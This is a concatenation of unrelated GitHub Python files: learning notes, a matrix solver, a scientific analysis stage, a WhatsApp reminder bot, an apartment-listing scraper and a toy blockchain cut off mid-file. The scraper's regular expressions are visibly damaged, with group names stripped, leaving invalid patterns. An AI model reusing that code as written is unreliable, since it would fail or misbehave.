md`\r\n## Import only something from mymodule. Code:\r\n## `from mymodule import person1`\r\nimport platform\r\nx = dir(platform)\r\nprint(x)\r\n\r\n\"\"\"\r\n# Module:\r\nplatform\r\ndatetime\r\njson\r\nRegular Expressions => import read\r\n# try except:\r\ntry:\r\nexcept:\r\n\"\"\"\r\n\r\n\"\"\"\r\n#File handling:\r\nw write, create file\r\na append, create file\r\nr read, error if file not exist\r\nx create file, error if file not exist\r\n\r\nt text\r\nb binary\r\n\r\nf = open(\"file.txt\",\"rt\")\r\nf.read()\r\nf.read(5)\r\nf.readline()\r\nf.write() # a, w\r\nf.close()\r\n#remove file:\r\nimport os\r\nif os.path.exists(\"file.txt\"):\r\n\tos.remove(\"file.txt\")\r\nos.rmdir(\"myfolder\")\r\n\r\n\"\"\"","repo_name":"elizabethmy/ProgramingTech","sub_path":"python/w3school_src/ClassObj.py","file_name":"ClassObj.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"14385156231","text":"import numpy as np\nfrom fractions import Fraction\nfrom colorama import Fore,Back\nimport os\n\n\n# Declaracion de funciones\n\n\n# Esta funcion sirve para limpiar la consola despues de seleccionar \"Sacar otra matriz\" en cualquier Sistema Operativo\ndef clear():\n if os.name == \"nt\":\n os.system(\"cls\")\n else:\n os.system(\"clear\")\n\n\n\n\ncopy = \"\"\"\n\n <----------------------------------------- ORIGINAL CODE BY BORDERCED ----------------------------------------->\n\n\n\"\"\"\n\nmenu2 = \"\"\"\n\n¡HOLA! Bienvenido a la calculadora de matrices, a continuacion ingresa las filas y columnas de tu sistema de ecuaciones\ncomo en el ejemplo:\n\n Columnas 3\n ↓ ↓ ↓ ↓ ↓ ↓\n → 2x + 3y + 2z = 10 [2, 3, 2 |10] ← \n Filas → 4x - 3y + 4z = 20 --------------> [4, -3,4 |20] ← 3 (3 x 3)\n → 5x + 4y + 5z = 30 [5, 4, 5 |30] ←\n \n\n\n\"\"\"\nmenu = \"\"\"\n\nA continuacion ingresa las constantes que tienes en tu sistema de ecuaciones por ejemplo:\n\n2x + 3y = 10 ------> [2, 3, 10]\n4x - 3y = 20 ------> [4 -3 20]\n\n\"\"\"\n\n# Variables necesarias para los bucles\n\nbucle = 0\nopcion = 0\nbucle2 = 0\nbucle3 = 0\n\n# Programa principal\n\nwhile bucle == 0:\n print(Fore.WHITE + menu2)\n \n while bucle3 == 0: # Bucle para pedir datos con manejo de errores\n \n try:\n filas = int(input(Fore.GREEN + \"Ingrese el número de filas ----> \"))\n columnas = int(input(Fore.RED + \"Ingrese el número de columnas ----> \"))\n except ValueError:\n print(Fore.RED + \"¡SOLO PUEDES INGRESAR NUMEROS!, VUELVE A INTENTARLO...\")\n continue\n \n if(filas != 0 and columnas != 0):\n break\n\n \n print(Fore.LIGHTGREEN_EX + menu)\n\n\n # La Matriz se llena de ceros para luego reeplazarlos por los datos que se ingresan\n\n matriz = np.zeros((filas, columnas+1))\n\n # Se ingresan los datos al array bidimensional con manejo de errores\n\n while bucle3 == 0:\n try:\n for i in range(filas):\n for j in range(columnas):\n elemento = float(input(f\"{Fore.WHITE}Ingresa el elemento en la fila {i+1}, columna {j+1}: \"))\n matriz[i][j] = elemento\n elemento = float(input(f\"Ingresa el resultado en la fila {i+1}: \"))\n matriz[i][columnas] = elemento\n except ValueError:\n print(Fore.RED + \"¡SOLO PUEDES INGRESAR NUMEROS!, VUELVE A INTENTARLO...\")\n i = 0\n j = 0\n continue\n else:\n break\n\n\n # Imprimir la matriz original\n\n print(Fore.LIGHTCYAN_EX + \"\\nMatriz original:\\n\")\n print(matriz)\n print(\"\\n\")\n\n\n # Método de Gauss-Jordan\n\n for columna_actual in range(columnas):\n \n if(filas != columnas):\n print(Fore.RED + \"¡SOLO PUEDES INGRESAR MATRICES CUADRADAS (n x n)\\n\")\n break\n\n # Imprimir la matriz\n\n print(f\"//////////////////////////////////////////////////// Matriz en la vuelta {columna_actual+1} ////////////////////////////////////////////////////\")\n print(\"\\n\")\n\n \n\n # Hacer unos en la diagonal\n\n divisor = matriz[columna_actual][columna_actual]\n for j in range(columnas + 1):\n matriz[columna_actual][j] /= divisor # se divide por toda la fila\n\n print(matriz) # Procedimiento\n print(\"\\n\")\n\n\n # ceros debajo del uno\n\n for i in range(columna_actual + 1, filas):\n factor =- matriz[i][columna_actual] / matriz[columna_actual][columna_actual] # se obtiene el numero a multiplicar\n for j in range(columnas + 1):\n if columna_actual == j:\n matriz[i][j] = 0\n else:\n matriz[i][j] += factor * matriz[columna_actual][j]\n\n print(matriz) # Procedimiento\n print(\"\\n\")\n\n\n\n # ceros encima del uno\n\n for i in range(columna_actual):\n factor =- matriz[i][columna_actual] / matriz[columna_actual][columna_actual] # obtenemos el numero a multiplicar\n for j in range(columnas + 1):\n if columna_actual == j:\n matriz[i][j] = 0\n else:\n matriz[i][j] += factor * matriz[columna_actual][j]\n\n\n if (columna_actual == columnas-1):\n MatrizEnCasoDeError = matriz\n\n\n\n print(matriz) # Procedimiento\n print(\"\\n\")\n\n\n \n print(Fore.YELLOW + \"\\n -------------------------------------------------------------------------\")\n\n try:\n\n print(Fore.LIGHTYELLOW_EX + \"\\nMatriz resuelta:\\n\")\n for fila in matriz:\n for elemento in fila:\n if isinstance(elemento, float):\n print(Fraction(elemento).limit_denominator(), end=\" | \")\n else:\n print(elemento, end=\" \")\n print()\n\n except ValueError:\n\n print(Back.RED + \"\\n\" + Fore.WHITE + \"La matriz no tiene solucion o tiene infinitas soluciones\" + Back.RESET + \"\\n\")\n print(MatrizEnCasoDeError)\n\n finally:\n\n print(Fore.YELLOW + \"\\n -------------------------------------------------------------------------\\n\")\n \n\n # Se pide confirmacion si se quiere terminar el programa\n\n\n while bucle2 == 0:\n try:\n opcion = int(input(Fore.LIGHTBLUE_EX + \"¿Quieres sacar otra Matriz? (0 si / 1 no)----> \"))\n except ValueError:\n print(Fore.RED + \"¡Solo puedes ingresar numeros!, intentalo nuevamente...\")\n continue\n \n if(opcion == 1):\n bucle = 1\n break\n else:\n clear() # Se limpia la consola y vuelve a pedir los datos para una nueva matriz\n break\n \nprint(Fore.LIGHTGREEN_EX + \"\\n\" + copy + Fore.WHITE)","repo_name":"Borderced/Matrix","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6062,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"14156473884","text":"# RotationalUncertaintyStage.py\n# (C)2014-2015\n# Scott Ernst\n\nfrom __future__ import print_function, absolute_import, unicode_literals, division\n\nfrom pyaid.number.NumericUtils import NumericUtils\n\nfrom cadence.analysis.AnalysisStage import AnalysisStage\nfrom cadence.analysis.shared.CsvWriter import CsvWriter\nfrom cadence.analysis.shared.plotting.Histogram import Histogram\nfrom cadence.svg.CadenceDrawing import CadenceDrawing\n\n#*************************************************************************************************** RotationalUncertaintyStage\nclass RotationalUncertaintyStage(AnalysisStage):\n \"\"\"A class for...\"\"\"\n\n#===============================================================================\n# C L A S S\n\n DRAWING_FOLDER_NAME = 'Rotational-Unc-Maps'\n\n#_______________________________________________________________________________\n def __init__(self, key, owner, **kwargs):\n \"\"\"Creates a new instance of RotationalUncertaintyStage.\"\"\"\n super(RotationalUncertaintyStage, self).__init__(\n key, owner,\n label='Rotational Uncertainty',\n **kwargs)\n\n self._uncs = []\n self._largeUncCsv = None\n self._tracks = []\n\n#===============================================================================\n# P R O T E C T E D\n\n#_______________________________________________________________________________\n def _preAnalyze(self):\n self._uncs = []\n self._tracks = []\n\n self.initializeFolder(self.DRAWING_FOLDER_NAME)\n\n csv = CsvWriter()\n csv.path = self.getPath('Large-Rotational-Uncertainties.csv')\n csv.autoIndexFieldName = 'Index'\n csv.addFields(\n ('uid', 'UID'),\n ('fingerprint', 'Fingerprint'),\n ('rotation', 'Rotation') )\n self._largeUncCsv = csv\n\n#_______________________________________________________________________________\n def _analyzeTrack(self, track, series, trackway, sitemap):\n self._tracks.append(track)\n r = track.rotationAngle\n self._uncs.append(r.valueDegrees.uncertainty)\n\n#_______________________________________________________________________________\n def _postAnalyze(self):\n h = Histogram(\n data=self._uncs,\n binCount=80,\n xLimits=(0, max(*self._uncs)),\n color='r',\n title='Distribution of Rotational Uncertainties',\n xLabel='Uncertainty Value (degrees)',\n yLabel='Frequency')\n p1 = h.save(self.getTempFilePath(extension='pdf'))\n\n h.isLog = True\n h.title += ' (log)'\n p2 = h.save(self.getTempFilePath(extension='pdf'))\n\n self.mergePdfs([p1, p2], self.getPath('Rotational-Uncertainty-Distribution.pdf'))\n\n average = NumericUtils.getMeanAndDeviation(self._uncs)\n self.logger.write('Average rotational uncertainty: %s' % average.label)\n\n #-------------------------------------------------------------------------------------------\n # FIND LARGE UNCERTAINTY TRACKS\n largeUncertaintyCount = 0\n drawing = None\n sitemap = None\n\n # If track uncertainty is 2x average, add that track to the spreadsheet and map overlay\n for t in self._tracks:\n\n # if the tracksite has changed, save previous map and make a new one\n if sitemap != t.trackSeries.trackway.sitemap:\n\n # save the last site map drawing (if there was one)\n if drawing:\n drawing.save()\n\n # then start a new drawing for this new site map\n sitemap = t.trackSeries.trackway.sitemap\n\n fileName = '%s-%s-ROTATION_UNC.svg' % (sitemap.name, sitemap.level)\n path = self.getPath(self.DRAWING_FOLDER_NAME, fileName, isFile=True)\n drawing = CadenceDrawing(path, sitemap)\n\n # create a group to be instanced for the spreadsheet values\n drawing.createGroup('rect1')\n # create a rectangle of 100x100 cm that is to be scaled by fractional meters\n drawing.rect((0, 0), 100, 100, scene=True, groupId='rect1')\n\n # create another group to be instanced for the mapped values.\n drawing.createGroup('rect2')\n # create a rectangle of 100x100 cm that is to be scaled by fractional meters\n drawing.rect((0, 0), 100, 100, scene=True, groupId='rect2')\n\n # and place a grid and the federal coordinates in the drawing file\n drawing.grid()\n drawing.federalCoordinates()\n\n # now examine the positional uncertainties for this track\n rotation = t.rotationAngle.valueDegrees\n if rotation.uncertainty <= 2.0*average.uncertainty:\n\n # then just indicate that this track has low uncertainty\n self._drawLowUncertaintyMarker(drawing, t)\n\n # label this track green\n # drawing.text(\n # t.name,\n # (t.x - 20, t.z),\n # scene=True,\n # stroke='green',\n # stroke_width='0.25',\n # font_size='8px',\n # font_family='Arial')\n continue\n\n # else, since the uncertainty is high, first write that track in the spreadsheet\n largeUncertaintyCount += 1\n self._largeUncCsv.createRow(\n uid=t.uid,\n fingerprint=t.fingerprint,\n r=rotation.label)\n\n # if either the measured width or length is 0, mark with a yellow disk with red outline\n if t.rotationMeasured == 0:\n drawing.circle(\n (t.x, t.z),\n 100*(t.widthUncertainty + t.lengthUncertainty)/2.0,\n scene=True,\n fill='yellow',\n stroke='red')\n\n # drawing.text(\n # t.name,\n # (t.x - 20, t.z),\n # scene=True,\n # stroke='black',\n # stroke_width='0.25',\n # font_size='6px',\n # font_family='Arial')\n continue\n\n self._drawHighUncertaintyMarker(drawing, t)\n\n # label this track with red\n # drawing.text(\n # t.name,\n # (t.x - 20, t.z),\n # scene=True,\n # stroke='red',\n # stroke_width='0.25',\n # font_size='6px',\n # font_family='Arial')\n\n # and close off with a final save of the drawing file\n if drawing:\n drawing.save()\n\n self.logger.write('%s Tracks with large rotational uncertainties found (%s%%)' % (\n largeUncertaintyCount, NumericUtils.roundToOrder(\n 100.0*float(largeUncertaintyCount)/float(len(self._tracks)), -1) ))\n\n self._largeUncCsv.save()\n self._tracks = []\n\n#_______________________________________________________________________________\n @classmethod\n def _drawLowUncertaintyMarker(cls, drawing, track):\n \"\"\" Indicate a low-uncertainty track at the specified location. The radius is the average\n of width and length uncertainty. \"\"\"\n\n rot = track.rotationAngle.valueDegrees\n drawing.circle(\n (track.x, track.z),\n 100.0*rot.uncertainty/180.0,\n scene=True,\n fill='green',\n stroke='green')\n\n#_______________________________________________________________________________\n @classmethod\n def _drawHighUncertaintyMarker(cls, drawing, track):\n \"\"\" Indicate a low-uncertainty track at the specified location. Radius is average\n uncertainty \"\"\"\n\n rot = track.rotationAngle.valueDegrees\n drawing.circle(\n (track.x, track.z),\n 100.0*rot.uncertainty/180.0,\n scene=True,\n fill='red',\n stroke='red')\n\n","repo_name":"sernst/Cadence","sub_path":"src/cadence/analysis/status/RotationalUncertaintyStage.py","file_name":"RotationalUncertaintyStage.py","file_ext":"py","file_size_in_byte":8229,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"7965248045","text":"import json\n\nlatitudes = open('latitudes.txt', 'r', encoding='utf-8').readlines()\nlongitudes = open('longitudes.txt', 'r', encoding='utf-8').readlines()\nnames = open('names.txt', 'r', encoding='utf-8').readlines()\nphone_numbers = open('phone_numbers.txt', 'r', encoding='utf-8').readlines()\n\nliste = []\n\nfor i in range(141):\n dictionary: dict[str, str] = {\n \"id\": 1000 + i,\n \"name\": names[i].strip(),\n \"phone_number\": phone_numbers[i].strip(),\n \"latitude\": latitudes[i].strip(),\n \"longitude\": longitudes[i].strip(),\n }\n\n liste.append(dictionary)\n\n\njson_data = json.dumps(liste, indent=None, ensure_ascii=False)\nfile = open(\"station_data.json\", 'x', encoding='utf-8')\nfile.write(json_data)\nfile.close()","repo_name":"yigiitd/BursaTaksi","sub_path":"data/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33349309154","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 17 10:01:26 2021\r\n\r\n__Version__: 0.0.3\r\n\r\n__Release__: 17/05/2021\r\n\r\n@author: Arthur Chabole\r\n====================================================================\r\nEQUIPE ZEBRA AERODESIGN 2021 - ZEBRINHA AGIOTA\r\n=====================================================================\r\nPassos para usar a zebrinha agiota\r\n0. Esteja com o pacote anaconda instalado https://www.anaconda.com/products/individual\r\n1. Instale o chrome driver https://sites.google.com/a/chromium.org/chromedriver/downloads\r\n2. Instale ou verifique se as bibliotecas selenium e BeautilfulSoup\r\n 2.1 Caso não esteja instalado vá no console do python e digite\r\n 2.2 pip install selenium (precione enter e espere instalar)\r\n 2.3 pip install BeautilfulSoup (precione enter e espere instalar)\r\n\r\n\"\"\"\r\n\r\nimport selenium \r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nimport time\r\nimport pandas as pd\r\nimport requests\r\nfrom bs4 import BeautifulSoup \r\n\r\nclass Zebrinha:\r\n \r\n #Colocar os XPATH aqui (selenium)\r\n Barra_pesquisa = '//*[@id=\"side\"]/div[1]/div/label/div/div[2]'\r\n Barra_mensagem = '//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]'\r\n Barra_grupo = '//*[@id=\"main\"]/header/div[2]/div[1]/div/span'\r\n Barra_docs = \"kia3R _2wzbH\"\r\n Botão_docs = \"_2-q8E _2Rdwt\"\r\n Botão_mais = '//*[@id=\"app\"]/div[1]/div[1]/div[2]/div[3]/span/div[1]/span/div[1]/div/section/div[5]/div[5]/div[2]/div/div'\r\n Botão_reporte = '//*[@id=\"app\"]/div[1]/div[1]/div[2]/div[3]/span/div[1]/span/div[1]/div/section/div[7]/div/div[2]'\r\n Botão_cancel = '//*[@id=\"app\"]/div[1]/span[2]/div[1]/div/div/div/div/div/div[2]/div[1]/div/div'\r\n Arquivo = '//*[@id=\"app\"]/div[1]/div[1]/div[2]/div[3]/span/div[1]/span/div[1]/div[2]/span/div/div/div/div/div[1]/div/div/div/div'\r\n \r\n #Nome das classes aqui (BeautifulSoup )\r\n #Campo_grupo = \"_1Flk2 _3xysY\"\r\n Campo_grupo = \"JnmQF _3QmOg\"\r\n Bloco_contato = \"_2aBzC\"\r\n Nome_contato = \"_35k-1 _1adfa _3-8er\"\r\n \r\n def __init__(self, PATH_driver, mes):\r\n self.PATH = PATH_driver\r\n self.driver = webdriver.Chrome(self.PATH)\r\n self.driver.maximize_window()\r\n self.driver.get('https://web.whatsapp.com')\r\n self.mes = mes\r\n \r\n def __buscarContatos__(self, contato):\r\n \r\n search = WebDriverWait(self.driver, 30).until(\r\n EC.presence_of_element_located((By.XPATH, Zebrinha.Barra_pesquisa)))\r\n \r\n actions = ActionChains(self.driver)\r\n actions.click(search)\r\n search.clear()\r\n actions.send_keys_to_element(search, self.contato)\r\n actions.send_keys_to_element(search, Keys.ENTER)\r\n \r\n actions.perform()\r\n \r\n def __enviarMensagem__(self):\r\n \r\n texto = self.driver.find_element_by_xpath(Zebrinha.Barra_mensagem)\r\n \r\n actions1 = ActionChains(self.driver)\r\n texto.clear()\r\n actions1.send_keys_to_element(texto, self.definir_Mensagem())\r\n actions1.send_keys_to_element(texto, Keys.ENTER)\r\n \r\n actions1.perform()\r\n\r\n def fechar(self):\r\n self.driver.close()\r\n try:\r\n print(f'Envio feito para {self.num} contatos realizado com sucesso! ;)')\r\n print(f'Volte sempre att: Zebrinha')\r\n except:\r\n print(f'Terminei a tarefa! seu computador está disponível agora ...')\r\n print(f'Volte sempre att: Zebrinha')\r\n\r\n #Esta com problema em encontrar grupos com mais de 20 contatos\r\n def buscarContatos_byGroup(self, Nome_Grupo, grupo_Grande=False):\r\n \r\n '''\r\n \r\n Encontra os nomes dos contatos que participam do grupo. \r\n Ainda estamos trabalhando em soluções para grupos com mais de 20 pessoas.\r\n Caso queira testar a funcionalidade alpha grupo_grande=True.\r\n \r\n Parameters\r\n ----------\r\n Nome_Grupo : string\r\n Nome do grupo que deseja pesquisar as pessoas.\r\n grupo_Grande: boolean\r\n Tenta achar contatos com grupos com de mais 20 pessoas.\r\n\r\n Returns\r\n -------\r\n pessoas_grupo : Lista\r\n Nome dos contatos que participam do grupo.\r\n\r\n '''\r\n \r\n search = WebDriverWait(self.driver, 30).until(\r\n EC.presence_of_element_located((By.XPATH, Zebrinha.Barra_pesquisa)))\r\n search.click()\r\n search.clear()\r\n search.send_keys(Nome_Grupo)\r\n search.send_keys(Keys.ENTER)\r\n \r\n ID_grupo = self.driver.find_element_by_xpath(Zebrinha.Barra_grupo)\r\n ID_grupo.click()\r\n \r\n try:\r\n #Espera a barra da ação aparecer e clica no ativo.\r\n more = WebDriverWait(self.driver, 1).until(\r\n EC.presence_of_element_located((By.XPATH, Zebrinha.Botão_mais)))\r\n more.click()\r\n print('Consegui acessar mais contatos! :)')\r\n except:\r\n print('Não consegui acessar mais contatos! :(')\r\n \r\n html = self.driver.page_source\r\n soup = BeautifulSoup(html, 'html.parser')\r\n \r\n contat_grupo = soup.find(class_= Zebrinha.Campo_grupo)\r\n blocos = contat_grupo.find_all(class_= Zebrinha.Bloco_contato)\r\n \r\n pessoas_grupo = []\r\n for bloco in blocos:\r\n pessoas_grupo.append((bloco.find(class_= Zebrinha.Nome_contato).text))\r\n \r\n if grupo_Grande:\r\n Reportar = self.driver.find_element_by_xpath(Zebrinha.Botão_reporte)\r\n Reportar.click()\r\n \r\n Cancelar = self.driver.find_element_by_xpath(Zebrinha.Botão_cancel)\r\n Cancelar.click()\r\n \r\n #Recarregar a página p/ aparecer os contatos\r\n html = self.driver.page_source\r\n soup = BeautifulSoup(html, 'html.parser')\r\n \r\n contat_grupo = soup.find(class_= Zebrinha.Campo_grupo)\r\n blocos = contat_grupo.find_all(class_= Zebrinha.Bloco_contato)\r\n \r\n for bloco in blocos:\r\n pessoas_grupo.append((bloco.find(class_= Zebrinha.Nome_contato).text))\r\n \r\n try:\r\n pessoas_grupo.remove('You')\r\n except:\r\n pass\r\n \r\n pessoas_grupo = sorted(pessoas_grupo) \r\n pessoas_grupo = pd.DataFrame(data=pessoas_grupo)\r\n pessoas_grupo = pessoas_grupo.drop_duplicates()\r\n \r\n return pessoas_grupo\r\n \r\n #O Google esta atualmente me bloqueando!\r\n def buscar_Docs(self, contatos):\r\n \r\n for self.contato in contatos:\r\n search = WebDriverWait(self.driver, 30).until(\r\n EC.presence_of_element_located((By.XPATH, Zebrinha.Barra_pesquisa)))\r\n \r\n search.click()\r\n search.clear()\r\n \r\n search.send_keys(self.contato)\r\n search.send_keys(Keys.ENTER)\r\n \r\n Barra_contato = self.driver.find_element_by_xpath(Zebrinha.Barra_grupo)\r\n Barra_contato.click()\r\n \r\n #Problema aqui: NOT LOCATED\r\n try:\r\n click_Docs = WebDriverWait(self.driver, 2).until(\r\n EC.presence_of_element_located((By.CLASS_NAME, Zebrinha.Barra_docs)))\r\n click_Docs.click()\r\n except:\r\n pass\r\n \r\n Docs = self.driver.find_element_by_class_name(Zebrinha.Botão_docs)\r\n Docs.click()\r\n \r\n try:\r\n Baixar_documento = WebDriverWait(self.driver, 2).until(\r\n EC.presence_of_element_located((By.XPATH, Zebrinha.Arquivo)))\r\n Baixar_documento.click()\r\n Baixar_documento.send_keys(Keys.ENTER)\r\n except:\r\n pass\r\n \r\n def enviar_Msg_fromExcel(self, posição_seuNome, local_excel, Preencher_NaN=True):\r\n '''\r\n Envia mensagem para os cantatos e utilizando informações contidas em um arquivo excel. \r\n Definida no método definir_Mensagem para a lista de contatos.\r\n\r\n Parameters\r\n ----------\r\n posição_seuNome : int\r\n Posição de onde esta seu nome no arquivo.\r\n local_excel : PATH\r\n Local onde esta com final '.xlsx'. Exemplo: 'D:/UNESP/Dados/caixinha.xlsx'.\r\n Preencher_NaN : Boolean, optional\r\n Completar as células vázias com 'não pago'. The default is True.\r\n\r\n Returns\r\n -------\r\n None.\r\n\r\n '''\r\n tabela = pd.read_excel(local_excel)\r\n tabela = tabela.replace('pago ', 'pagou') # ERRO: 'pago' verificar com financeiro\r\n tabela = tabela.drop(posição_seuNome)\r\n \r\n if Preencher_NaN:\r\n tabela = tabela.fillna('não pagou')\r\n \r\n self.num = 0 \r\n for self.contato, self.situação in zip(tabela['Nome'], tabela[self.mes]):\r\n self.__buscarContatos__(self.contato)\r\n self.__enviarMensagem__()\r\n self.num += 1\r\n \r\n def enviar_Msg_fromlista(self, Lista_contatos):\r\n '''\r\n Envia mensagem definida no método definir_Mensagem para a lista de contatos.\r\n \r\n Parameters\r\n ----------\r\n Lista_contatos : Lista ou array\r\n Coloque a lista de contatos que deseja enviar \r\n as mensagens. Ex: contatos = ['Arthur', 'Rafael', 'Rebeca']. Importante \r\n colocar '[ ... ]'.\r\n\r\n Returns\r\n -------\r\n None.\r\n '''\r\n self.num = 0 \r\n for self.contato in Lista_contatos:\r\n self.__buscarContatos__(self.contato)\r\n self.__enviarMensagem__()\r\n self.num += 1\r\n \r\n def definir_Mensagem(self):\r\n return f''' \r\n \r\n Olá, {self.contato} vc {self.situação} o mês de {self.mes} att: Zebrinha agiota\r\n ;)\r\n \r\n \r\n '''\r\n\r\n#------------------------ PROGRAME AQUI - EXPLEMPLO DE CÓDIGO -----------------------\r\n\r\nPATH = 'C:/Users/arthu/Downloads/chromedriver_win32/chromedriver.exe' \r\n \r\nZb = Zebrinha(PATH, 'Janeiro')\r\nLocal = 'D:/UNESP/AeroDesign/Códigos_Python/Dados/caixa_teste.xlsx'\r\nZb.enviar_Msg_fromExcel(1, Local, True)\r\nZb.fechar()\r\n\r\n","repo_name":"Zebra-Aerodesign/Python","sub_path":"Automação/Zebrinha_agiota.py","file_name":"Zebrinha_agiota.py","file_ext":"py","file_size_in_byte":10536,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"26748490464","text":"# -*- coding: utf-8 -*-\n\"\"\"Furnished apartments from City Wohnen.\"\"\"\nimport re\nfrom datetime import datetime\nfrom typing import Any, Dict\nfrom urllib.parse import unquote_plus\n\nimport requests\nfrom scrapy import Request\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.loader import ItemLoader\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom w3lib.url import url_query_cleaner\n\nfrom tegenaria.items import ApartmentItem\nfrom tegenaria.spiders import SpiderMixin\n\n\nclass CityWohnenSpider(CrawlSpider, SpiderMixin):\n \"\"\"Furnished apartments from City Wohnen.\"\"\"\n\n name = \"city_wohnen\"\n allowed_domains = [\"city-wohnen.de\"]\n\n MAX_RECORDS = 300\n start_urls = (\n # This link shows an empty page...\n # 'https://www.city-wohnen.de/eng/berlin/furnished-flats/flat-search/'\n # ... because the actual results are loaded by an AJAX call.\n \"https://www.city-wohnen.de/rpc.php?pageid=401&action=services&service=ciwo_search&cmd=search&\"\n \"filters=city%3Dberlin%26date_from%3D%26room_count%3D1%26rent_amount_min%3D0%26rent_amount_max%3D4375%26\"\n \"person_count%3D1&order=available_from&page_nr=1&page_size={}\".format(MAX_RECORDS),\n )\n\n URL_REGEX = r\"/eng/berlin/[0-9]+[a-z-]+\"\n rules = (Rule(LinkExtractor(allow=URL_REGEX, process_value=url_query_cleaner), callback=\"parse_item\", follow=True),)\n\n field_regex = {\n \"availability\": re.compile(r\".*from (?P[0-9/]+).*\", re.MULTILINE),\n \"neighborhood\": re.compile(r\"furnished apartment in Berlin-(?P.+)\"),\n \"address\": re.compile(r\".+/maps/search/(?P
.+)/@[0-9.,]+\"),\n }\n\n def start_requests(self):\n \"\"\"Parse the results from the hidden AJAX call, and start requests to parse the ads.\n\n @url https://www.city-wohnen.de\n @returns items 0 0\n @returns requests 1 200\n \"\"\"\n for url in self.start_urls:\n response = requests.get(url)\n results = response.json().get(\"results\")\n for link in re.compile(self.URL_REGEX).findall(results):\n yield Request(\"https://www.city-wohnen.de{}\".format(link), callback=self.parse_item)\n\n def parse_item(self, response):\n \"\"\"Parse a page with an apartment.\n\n @url https://www.city-wohnen.de/eng/berlin/32638-moeblierte-wohnung-berlin-friedrichshain-gruenberger-strasse\n @returns items 1 1\n @scrapes url title availability description neighborhood address warm_rent_price size rooms\n \"\"\"\n self.shutdown_on_error()\n item = ItemLoader(ApartmentItem(), response=response)\n item.add_value(\"url\", response.url)\n\n item.add_css(\"title\", \"div.text_data > h2::text\")\n item.add_css(\"availability\", \"div.row > div.text_data > p::text\")\n item.add_css(\"description\", \"div.object_details div.col_left p::text\")\n item.add_value(\n \"neighborhood\", response.css(\"div.object_meta div.container div.text_data p strong::text\").extract()[0]\n )\n item.add_xpath(\"address\", \"//li[@class='map']/a/@href\")\n\n keys = response.css(\"div.object_meta table.object_meta_data th::text\").extract()\n values = response.css(\"div.object_meta table.object_meta_data td::text\").extract()\n features = dict(zip(keys, values))\n item.add_value(\"warm_rent_price\", features.get(\"Rent\"))\n item.add_value(\"size\", features.get(\"Size\"))\n item.add_value(\"rooms\", features.get(\"Room/s\"))\n\n return item.load_item()\n\n def before_marshmallow(self, data: Dict[str, Any]) -> Dict[str, Any]:\n \"\"\"Clean the item before loading schema on Marshmallow.\"\"\"\n for field, regex in self.field_regex.items():\n clean_field = data.get(field, \"\").strip(\" \\t\\n\")\n match = regex.match(clean_field)\n if not match:\n continue\n\n data.update(match.groupdict())\n if field == \"availability\":\n # Must be an ISO date for the database.\n data[\"availability\"] = datetime.strptime(data.get(\"availability\", \"\"), \"%d/%m/%Y\").date().isoformat()\n elif field == \"address\":\n # Decode the URL.\n data[\"address\"] = unquote_plus(data[\"address\"])\n\n return data\n","repo_name":"andreoliwa/scrapy-tegenaria","sub_path":"tegenaria/spiders/city_wohnen.py","file_name":"city_wohnen.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"2507028141","text":"import hashlib\nfrom datetime import datetime\nimport datetime\n\nclass Block():\n def __init__(self, timestamp, data, previous_hash):\n self.timestamp = timestamp\n self.data = data\n self.previous_hash = previous_hash\n self.hash = self.calc_hash()\n self.prev = None\n\n def calc_hash(self):\n sha = hashlib.sha256()\n hash_str = self.data.encode('utf-8')\n sha.update(hash_str)\n return sha.hexdigest()\n\n def __repr__(self):\n s = ''\n s += \"Timestamp: \" + str(self.timestamp) + \"\\n\"\n s += \"Data: \" + str(self.data) + \"\\n\"\n s += \"SHA256 Hash: \" + str(self.hash) + \"\\n\"\n s += \"Prev_Hash: \" + str(self.previous_hash) + \"\\n\"\n assert type(s)== str\n return s\n\nclass Blockchain():\n def __init__(self): # initialize when creating a chain\n self.chain_head = self.block_zero()\n self.size = 1\n\n def block_zero(self):\n return Block(datetime.datetime.utcnow(),\n 'First', '0')\n\n def chain_block(self, data):\n new_block = Block(datetime.datetime.utcnow(), data,\n self.chain_head.hash)\n new_block.prev = self.chain_head\n self.chain_head = new_block\n self.size+=1\n\n def get_chain_size(self): # exclude genesis block\n return self.size\n\n def is_chain_consistent(self):\n head= self.chain_head\n flag = True\n idx = self.size -1\n while head.prev is not None :\n if head.prev.hash != head.previous_hash:\n flag = False\n print(f'Blocks {idx} and {idx-1} are inconsistent')\n if head.hash != head.calc_hash():\n flag = False\n print('Block {idx} hash not consistent')\n if head.prev.timestamp >= head.timestamp:\n flag = False\n print(f'Worng timestamp at block {idx}')\n idx-=1\n head=head.prev\n return flag\n\n def print_block(self):\n head= self.chain_head\n while head.prev is not None:\n print('-'*20)\n print(head)\n print('-'*20)\n head= head.prev\n\n\n\n\nif __name__ == '__main__':\n\n def test_blockchain(block_chain):\n block_chain.is_chain_consistent()\n\n\n block_chain = Blockchain()\n for i in range(1,3):\n block_chain.chain_block(data = f'Test block {i}')\n test_blockchain(block_chain)\n\n block_chain.print_block()\n\n\n #Aditional testing\n # 1 same data\n block_chain = Blockchain()\n for i in range(1,3):\n block_chain.chain_block(data = f'Test block')\n test_blockchain(block_chain)\n\n # 2 Empty chain\n block_chain = Blockchain()\n 